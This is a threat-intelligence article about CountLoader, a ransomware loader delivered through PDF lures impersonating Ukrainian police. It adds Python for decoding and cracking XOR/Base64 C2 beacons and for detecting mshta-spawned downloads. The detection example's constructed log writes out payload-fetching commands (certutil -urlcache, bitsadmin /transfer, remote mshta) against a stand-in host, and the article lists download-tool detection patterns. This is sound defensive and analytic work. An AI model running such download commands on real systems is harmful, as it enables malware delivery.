In recent months, security teams have observed the emergence of a sophisticated malware loader, dubbed CountLoader, which uses weaponized PDF files to deliver ransomware payloads.
First detected in late August 2025, CountLoader is linked to several Russian-speaking cybercriminal groups, including affiliates of LockBit, BlackBasta, and Qilin.
By masquerading as official documents, often impersonating Ukrainian law enforcement, the loader combines social engineering with a PDF-based delivery chain to gain an initial foothold in target environments.
CountLoader is deployed in three distinct versions written in JScript (.hta), .NET, and PowerShell.
Each variant has its own characteristics: the JScript version offers the most comprehensive functionality, with several download and execution methods; the .NET binary enforces a hardcoded kill switch that stops it running after a preset date; and the PowerShell script is a concise loader that executes its payload reflectively in memory.
Silent Push analysts noted that all variants share a custom C2 communication protocol that uses XOR and Base64 routines to obfuscate control traffic (neither is encryption, so captured traffic can be decoded once the key is known).
CountLoader's impact extends well beyond initial access. Upon successful execution, the loader fingerprints device-specific details, such as hardware identifiers, domain membership, and the presence of antivirus products, and uses them to generate a unique victim ID.
It then enters a persistent C2 polling loop, downloading secondary payloads such as Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.
Organizations with domain-joined systems in Eastern Europe were the primary targets, suggesting deliberate selection of corporate and governmental entities.
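The article says the C2 protocol hides traffic with XOR and Base64 routines but does not give the key, the key length, or the order in which the two are applied. The following is an added analyst helper, not CountLoader's code or Silent Push's tooling. It assumes the scheme is Base64(XOR(plaintext, repeating key)) with JSON task bodies, and shows how an analyst decodes a captured beacon with a known key and how a repeating XOR key can be recovered from a capture by a known-plaintext (crib) attack when the body is known to start with predictable JSON. The sample task, key, and crib are constructed for the example.

```python
import base64
import json
from typing import Optional

# Added example, not CountLoader's own routines. ASSUMED scheme:
#   body = Base64( XOR(json_task, repeating_key) )
# The real key, key length and layering order are not stated on the page.

SAMPLE_KEY = b"k3y"  # constructed key for the demo below
SAMPLE_TASK = {      # constructed task body in the shape a loader might poll for
    "id": "c0ffee",
    "task": "download",
    "url": "http://example.invalid/x.exe",
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. Symmetric: encoding and decoding are the same op."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_beacon(task: dict, key: bytes) -> str:
    """Produce an obfuscated beacon body under the assumed scheme (for building test captures)."""
    return base64.b64encode(xor_bytes(json.dumps(task).encode(), key)).decode()


def decode_beacon(blob: str, key: bytes) -> dict:
    """Reverse the assumed scheme with a known key and parse the JSON task inside."""
    return json.loads(xor_bytes(base64.b64decode(blob), key).decode())


def recover_key(blob: str, crib: bytes, max_key_len: int = 16) -> Optional[bytes]:
    """Known-plaintext recovery of a repeating XOR key.

    If the plaintext is JSON, its first bytes are predictable (the crib, e.g. b'{"id": "').
    XORing the crib against the same offset of the raw ciphertext yields the key stream.
    For each candidate key length, the first key_len bytes of that stream are tried as
    the key and accepted only if the entire decoded body parses as JSON. Returns None
    when no key length up to max_key_len (bounded by the crib length) works.
    """
    raw = base64.b64decode(blob)
    if len(raw) < len(crib):
        return None
    stream = xor_bytes(raw[: len(crib)], crib)
    for key_len in range(1, min(max_key_len, len(crib)) + 1):
        key = stream[:key_len]
        try:
            json.loads(xor_bytes(raw, key).decode())
            return key
        except (UnicodeDecodeError, json.JSONDecodeError):
            continue
    return None


if __name__ == "__main__":
    captured = encode_beacon(SAMPLE_TASK, SAMPLE_KEY)
    print("captured body:", captured)
    print("decoded with known key:", decode_beacon(captured, SAMPLE_KEY))
    # json.dumps emits '{"id": "' for the first field, so that is the crib.
    print("recovered key:", recover_key(captured, b'{"id": "'))
```

The crib attack works because XOR with a repeating key leaks the key wherever the plaintext is known; a short predictable prefix such as a JSON field name is enough when the key is no longer than the crib. Against a longer key, the same function can be called with a longer crib (the full first field, for example) or extended to drag the crib along the ciphertext.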
PDF lure impersonating the Ukrainian police (Source: Silent Push)
CountLoader was notably delivered via a PDF phishing lure impersonating the National Police of Ukraine. The malicious PDF carried an embedded HTML Application (HTA) object that caused mshta.exe to fetch and execute the JScript loader.
On opening the document, victims saw an official-looking notification instructing them to "start your request" via an embedded link; clicking it initiated the loader download.
Infection Mechanism
CountLoader's infection chain begins with the weaponized PDF, which relies on user interaction rather than on any zero-day vulnerability.
The PDF embeds an HTA object that invokes the Windows mshta engine when the victim clicks the link.
The HTA script is obfuscated with a free JavaScript obfuscator and runs to around 850 lines of code.
Main function (Source: Silent Push)
After deobfuscation, the main loop responsible for C2 contact becomes visible:
for (let i = 1; i
Once contact is established, CountLoader fetches tasks with HTTP POST requests that carry a custom Bearer token issued by the C2.
Tasks include downloading executables via WinHTTP, MSXML2, curl, bitsadmin, or certutil, a spread of methods that shows the loader's adaptability and its authors' familiarity with Windows built-ins.
After a task runs, CountLoader reports completion back to the server, giving the operators reliable task tracking.
This workflow underscores CountLoader's design as a highly modular and persistent loader, able to deliver a range of ransomware and post-exploitation tools while evading detection through code obfuscation and obfuscated C2 communications.
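The chain described above (document reader launches mshta.exe, which then pulls payloads with curl, bitsadmin, or certutil) leaves a distinctive process tree. The following is an added detection example, not Silent Push's or CountLoader's code. It parses constructed process-creation records in a simplified Sysmon Event ID 1 layout (image | parent image | command line, with invented paths and an example.invalid host) and flags mshta.exe spawned by a PDF reader or launched with a remote URL, and download-style LOLBin invocations whose parent is mshta.exe. The reader list and the per-tool argument patterns are assumptions chosen for the example, not indicators published for CountLoader.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Added detection example, not vendor code. Field layout and every value in
# SAMPLE_LOG are CONSTRUCTED to mirror the chain the article describes.

DOC_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "sumatrapdf.exe"}

# Assumed download-style argument patterns for the LOLBins the article names.
# WinHTTP and MSXML2 run in-process inside mshta.exe and never show up as
# child processes, so they are not covered here (see the note after the block).
DOWNLOADERS: Dict[str, "re.Pattern[str]"] = {
    "curl.exe": re.compile(r"https?://", re.I),
    "bitsadmin.exe": re.compile(r"/transfer\b", re.I),
    "certutil.exe": re.compile(r"-urlcache\b", re.I),
    "powershell.exe": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
}

URL_RE = re.compile(r"https?://", re.I)

SAMPLE_LOG = r"""
C:\Windows\System32\mshta.exe|C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe|mshta.exe https://example.invalid/lure.hta
C:\Windows\System32\certutil.exe|C:\Windows\System32\mshta.exe|certutil -urlcache -split -f https://example.invalid/p.exe C:\Users\Public\p.exe
C:\Windows\System32\bitsadmin.exe|C:\Windows\System32\mshta.exe|bitsadmin /transfer job /download https://example.invalid/p.exe C:\Users\Public\p.exe
C:\Windows\System32\certutil.exe|C:\Windows\System32\cmd.exe|certutil -hashfile C:\Users\Public\p.exe SHA256
C:\Windows\System32\mshta.exe|C:\Windows\explorer.exe|mshta.exe C:\Tools\local.hta
"""


@dataclass
class ProcEvent:
    line_no: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> List[ProcEvent]:
    """Parse 'image|parent|command line' records, skipping blank lines."""
    events = []
    for n, raw in enumerate(text.strip().splitlines(), start=1):
        if not raw.strip():
            continue
        image, parent, cmd = raw.split("|", 2)
        events.append(ProcEvent(n, image.strip(), parent.strip(), cmd.strip()))
    return events


def classify(ev: ProcEvent) -> List[str]:
    """Return the list of suspicious behaviours one event exhibits (empty if benign)."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    findings = []
    if img == "mshta.exe":
        if parent in DOC_READERS:
            findings.append("mshta.exe spawned by document reader")
        if URL_RE.search(ev.command_line):
            findings.append("mshta.exe launched with remote URL")
    if img in DOWNLOADERS and parent == "mshta.exe" and DOWNLOADERS[img].search(ev.command_line):
        findings.append(f"{img} download spawned by mshta.exe")
    return findings


def hunt(text: str) -> List[dict]:
    """Run classify() over every record and return only the ones with findings."""
    hits = []
    for ev in parse_log(text):
        findings = classify(ev)
        if findings:
            hits.append({"line": ev.line_no, "image": basename(ev.image), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['image']}: {'; '.join(hit['findings'])}")
```

Process-tree rules like these catch the curl, bitsadmin, and certutil paths but not downloads made with WinHTTP or MSXML2 objects from inside the script, which leave no child process; those need network telemetry showing mshta.exe itself opening outbound connections (Sysmon Event ID 3) or script-content logging through AMSI. In most environments mshta.exe should never be a child of a PDF reader, so the first rule alone is a high-confidence signal.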